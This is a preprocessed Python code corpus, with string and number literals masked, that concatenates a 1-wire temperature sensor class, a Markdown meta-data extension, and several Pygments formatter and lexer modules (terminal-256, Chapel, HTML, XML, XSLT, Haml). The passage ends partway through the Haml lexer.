) : <EOL> raise NoSensorFoundError ( self . type , self . 
id ) <EOL> def _load_kernel_modules ( self ) : <EOL> """<STR_LIT>""" <EOL> if not path . isdir ( self . BASE_DIRECTORY ) : <EOL> system ( "<STR_LIT>" ) <EOL> system ( "<STR_LIT>" ) <EOL> for _ in range ( self . RETRY_ATTEMPTS ) : <EOL> if path . isdir ( self . BASE_DIRECTORY ) : <EOL> break <EOL> sleep ( self . RETRY_DELAY_SECONDS ) <EOL> else : <EOL> raise KernelModuleLoadError ( ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . format ( <EOL> self . __class__ . __name__ , self . type , self . id ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . format ( <EOL> self . __class__ . __name__ , self . type_name , self . type , self . id ) <EOL> @ property <EOL> def type_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . TYPE_NAMES . get ( self . type , "<STR_LIT>" ) <EOL> @ property <EOL> def slave_prefix ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % hex ( self . type ) [ <NUM_LIT:2> : ] <EOL> def exists ( self ) : <EOL> """<STR_LIT>""" <EOL> return path . exists ( self . sensorpath ) <EOL> @ property <EOL> def raw_sensor_value ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with open ( self . sensorpath , "<STR_LIT:r>" ) as f : <EOL> data = f . readlines ( ) <EOL> except IOError : <EOL> raise NoSensorFoundError ( self . type , self . id ) <EOL> if data [ <NUM_LIT:0> ] . strip ( ) [ - <NUM_LIT:3> : ] != "<STR_LIT>" : <EOL> raise SensorNotReadyError ( ) <EOL> return float ( data [ <NUM_LIT:1> ] . split ( "<STR_LIT:=>" ) [ <NUM_LIT:1> ] ) <EOL> @ classmethod <EOL> def _get_unit_factor ( cls , unit ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if isinstance ( unit , str ) : <EOL> unit = cls . UNIT_FACTOR_NAMES [ unit ] <EOL> return cls . UNIT_FACTORS [ unit ] <EOL> except KeyError : <EOL> raise UnsupportedUnitError ( ) <EOL> def get_temperature ( self , unit = DEGREES_C ) : <EOL> """<STR_LIT>""" <EOL> factor = self . _get_unit_factor ( unit ) <EOL> return factor ( self . 
raw_sensor_value ) <EOL> def get_temperatures ( self , units ) : <EOL> """<STR_LIT>""" <EOL> sensor_value = self . raw_sensor_value <EOL> return [ self . _get_unit_factor ( unit ) ( sensor_value ) for unit in units ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from __future__ import unicode_literals <EOL> from . import Extension <EOL> from . . preprocessors import Preprocessor <EOL> import re <EOL> META_RE = re . compile ( r'<STR_LIT>' ) <EOL> META_MORE_RE = re . compile ( r'<STR_LIT>' ) <EOL> class MetaExtension ( Extension ) : <EOL> """<STR_LIT>""" <EOL> def extendMarkdown ( self , md , md_globals ) : <EOL> """<STR_LIT>""" <EOL> md . preprocessors . add ( "<STR_LIT>" , MetaPreprocessor ( md ) , "<STR_LIT>" ) <EOL> class MetaPreprocessor ( Preprocessor ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , lines ) : <EOL> """<STR_LIT>""" <EOL> meta = { } <EOL> key = None <EOL> while lines : <EOL> line = lines . pop ( <NUM_LIT:0> ) <EOL> if line . strip ( ) == '<STR_LIT>' : <EOL> break <EOL> m1 = META_RE . match ( line ) <EOL> if m1 : <EOL> key = m1 . group ( '<STR_LIT:key>' ) . lower ( ) . strip ( ) <EOL> value = m1 . group ( '<STR_LIT:value>' ) . strip ( ) <EOL> try : <EOL> meta [ key ] . append ( value ) <EOL> except KeyError : <EOL> meta [ key ] = [ value ] <EOL> else : <EOL> m2 = META_MORE_RE . match ( line ) <EOL> if m2 and key : <EOL> meta [ key ] . append ( m2 . group ( '<STR_LIT:value>' ) . strip ( ) ) <EOL> else : <EOL> lines . insert ( <NUM_LIT:0> , line ) <EOL> break <EOL> self . markdown . Meta = meta <EOL> return lines <EOL> def makeExtension ( configs = { } ) : <EOL> return MetaExtension ( configs = configs ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from pygments . formatter import Formatter <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class EscapeSequence : <EOL> def __init__ ( self , fg = None , bg = None , bold = False , underline = False ) : <EOL> self . fg = fg <EOL> self . bg = bg <EOL> self . bold = bold <EOL> self . underline = underline <EOL> def escape ( self , attrs ) : <EOL> if len ( attrs ) : <EOL> return "<STR_LIT>" + "<STR_LIT:;>" . join ( attrs ) + "<STR_LIT:m>" <EOL> return "<STR_LIT>" <EOL> def color_string ( self ) : <EOL> attrs = [ ] <EOL> if self . fg is not None : <EOL> attrs . extend ( ( "<STR_LIT>" , "<STR_LIT:5>" , "<STR_LIT>" % self . fg ) ) <EOL> if self . bg is not None : <EOL> attrs . extend ( ( "<STR_LIT>" , "<STR_LIT:5>" , "<STR_LIT>" % self . bg ) ) <EOL> if self . bold : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . underline : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> return self . escape ( attrs ) <EOL> def reset_string ( self ) : <EOL> attrs = [ ] <EOL> if self . fg is not None : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . bg is not None : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . bold or self . underline : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> return self . escape ( attrs ) <EOL> class Terminal256Formatter ( Formatter ) : <EOL> r"""<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> filenames = [ ] <EOL> def __init__ ( self , ** options ) : <EOL> Formatter . __init__ ( self , ** options ) <EOL> self . xterm_colors = [ ] <EOL> self . best_match = { } <EOL> self . style_string = { } <EOL> self . usebold = '<STR_LIT>' not in options <EOL> self . useunderline = '<STR_LIT>' not in options <EOL> self . _build_color_table ( ) <EOL> self . _setup_styles ( ) <EOL> def _build_color_table ( self ) : <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . 
xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> valuerange = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> r = valuerange [ ( i // <NUM_LIT> ) % <NUM_LIT:6> ] <EOL> g = valuerange [ ( i // <NUM_LIT:6> ) % <NUM_LIT:6> ] <EOL> b = valuerange [ i % <NUM_LIT:6> ] <EOL> self . xterm_colors . append ( ( r , g , b ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT> ) : <EOL> v = <NUM_LIT:8> + i * <NUM_LIT:10> <EOL> self . xterm_colors . append ( ( v , v , v ) ) <EOL> def _closest_color ( self , r , g , b ) : <EOL> distance = <NUM_LIT> * <NUM_LIT> * <NUM_LIT:3> <EOL> match = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> values = self . 
xterm_colors [ i ] <EOL> rd = r - values [ <NUM_LIT:0> ] <EOL> gd = g - values [ <NUM_LIT:1> ] <EOL> bd = b - values [ <NUM_LIT:2> ] <EOL> d = rd * rd + gd * gd + bd * bd <EOL> if d < distance : <EOL> match = i <EOL> distance = d <EOL> return match <EOL> def _color_index ( self , color ) : <EOL> index = self . best_match . get ( color , None ) <EOL> if index is None : <EOL> try : <EOL> rgb = int ( str ( color ) , <NUM_LIT:16> ) <EOL> except ValueError : <EOL> rgb = <NUM_LIT:0> <EOL> r = ( rgb >> <NUM_LIT:16> ) & <NUM_LIT> <EOL> g = ( rgb >> <NUM_LIT:8> ) & <NUM_LIT> <EOL> b = rgb & <NUM_LIT> <EOL> index = self . _closest_color ( r , g , b ) <EOL> self . best_match [ color ] = index <EOL> return index <EOL> def _setup_styles ( self ) : <EOL> for ttype , ndef in self . style : <EOL> escape = EscapeSequence ( ) <EOL> if ndef [ '<STR_LIT>' ] : <EOL> escape . fg = self . _color_index ( ndef [ '<STR_LIT>' ] ) <EOL> if ndef [ '<STR_LIT>' ] : <EOL> escape . bg = self . _color_index ( ndef [ '<STR_LIT>' ] ) <EOL> if self . usebold and ndef [ '<STR_LIT>' ] : <EOL> escape . bold = True <EOL> if self . useunderline and ndef [ '<STR_LIT>' ] : <EOL> escape . underline = True <EOL> self . style_string [ str ( ttype ) ] = ( escape . color_string ( ) , <EOL> escape . reset_string ( ) ) <EOL> def format ( self , tokensource , outfile ) : <EOL> if not self . encoding and hasattr ( outfile , "<STR_LIT>" ) and hasattr ( outfile , "<STR_LIT>" ) and outfile . isatty ( ) and sys . version_info < ( <NUM_LIT:3> , ) : <EOL> self . encoding = outfile . encoding <EOL> return Formatter . format ( self , tokensource , outfile ) <EOL> def format_unencoded ( self , tokensource , outfile ) : <EOL> for ttype , value in tokensource : <EOL> not_found = True <EOL> while ttype and not_found : <EOL> try : <EOL> on , off = self . style_string [ str ( ttype ) ] <EOL> spl = value . split ( '<STR_LIT:\n>' ) <EOL> for line in spl [ : - <NUM_LIT:1> ] : <EOL> if line : <EOL> outfile . 
write ( on + line + off ) <EOL> outfile . write ( '<STR_LIT:\n>' ) <EOL> if spl [ - <NUM_LIT:1> ] : <EOL> outfile . write ( on + spl [ - <NUM_LIT:1> ] + off ) <EOL> not_found = False <EOL> except KeyError : <EOL> ttype = ttype [ : - <NUM_LIT:1> ] <EOL> if not_found : <EOL> outfile . write ( value ) </s>
<s> """<STR_LIT>""" <EOL> from pygments . lexer import RegexLexer , bygroups , words <EOL> from pygments . token import Text , Comment , Operator , Keyword , Name , String , Number , Punctuation <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class ChapelLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> filenames = [ '<STR_LIT>' ] <EOL> aliases = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT:\n>' , Text ) , <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Comment . Single ) , <EOL> ( r'<STR_LIT>' , Comment . Multiline ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Declaration ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Type ) , <EOL> ( words ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , suffix = r'<STR_LIT>' ) , <EOL> Keyword ) , <EOL> ( r'<STR_LIT>' , bygroups ( Keyword , Text ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , bygroups ( Keyword , Text ) , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number . Float ) , <EOL> ( r'<STR_LIT>' , Number . Float ) , <EOL> ( r'<STR_LIT>' , Number . 
Bin ) , <EOL> ( r'<STR_LIT>' , Number . Hex ) , <EOL> ( r'<STR_LIT>' , Number . Oct ) , <EOL> ( r'<STR_LIT>' , Number . Integer ) , <EOL> ( r'<STR_LIT>' , String ) , <EOL> ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , Operator ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> ( r'<STR_LIT>' , Name . Other ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from pygments . lexer import RegexLexer , ExtendedRegexLexer , include , bygroups , default , using <EOL> from pygments . token import Text , Comment , Operator , Keyword , Name , String , Punctuation <EOL> from pygments . util import looks_like_xml , html_doctype_matches <EOL> from pygments . lexers . javascript import JavascriptLexer <EOL> from pygments . lexers . jvm import ScalaLexer <EOL> from pygments . lexers . css import CssLexer , _indentation , _starts_block <EOL> from pygments . lexers . ruby import RubyLexer <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> class HtmlLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT:html>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> flags = re . IGNORECASE | re . DOTALL <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT>' , Name . Tag , ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , Name . Tag , ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , bygroups ( Name . Attribute , Text ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . 
Tag , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , using ( JavascriptLexer ) ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , using ( CssLexer ) ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ( "<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if html_doctype_matches ( text ) : <EOL> return <NUM_LIT:0.5> <EOL> class DtdLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> flags = re . MULTILINE | re . DOTALL <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Entity ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Name . Entity , Text , Keyword ) ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Operator ) , <EOL> ( r'<STR_LIT>' , String . Double ) , <EOL> ( r'<STR_LIT>' , String . Single ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . 
Tag ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword . Reserved ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if not looks_like_xml ( text ) and ( '<STR_LIT>' in text or '<STR_LIT>' in text or '<STR_LIT>' in text ) : <EOL> return <NUM_LIT> <EOL> class XmlLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> flags = re . MULTILINE | re . DOTALL | re . UNICODE <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . 
Tag ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( '<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ( "<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if looks_like_xml ( text ) : <EOL> return <NUM_LIT> <EOL> class XsltLexer ( XmlLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> EXTRA_KEYWORDS = set ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:message>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) ) <EOL> def get_tokens_unprocessed ( self , text ) : <EOL> for index , token , value in XmlLexer . get_tokens_unprocessed ( self , text ) : <EOL> m = re . match ( '<STR_LIT>' , value ) <EOL> if token is Name . Tag and m and m . group ( <NUM_LIT:1> ) in self . 
EXTRA_KEYWORDS : <EOL> yield index , Keyword , value <EOL> else : <EOL> yield index , token , value <EOL> def analyse_text ( text ) : <EOL> if looks_like_xml ( text ) and '<STR_LIT>' in text : <EOL> return <NUM_LIT> <EOL> class HamlLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT>' <EOL> _comma_dot = r'<STR_LIT>' + _dot + '<STR_LIT:)>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _comma_dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( RubyLexer ) ) , <EOL> '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _comma_dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( RubyLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . 
Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( RubyLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( RubyLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( RubyLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( RubyLexer ) , String . 
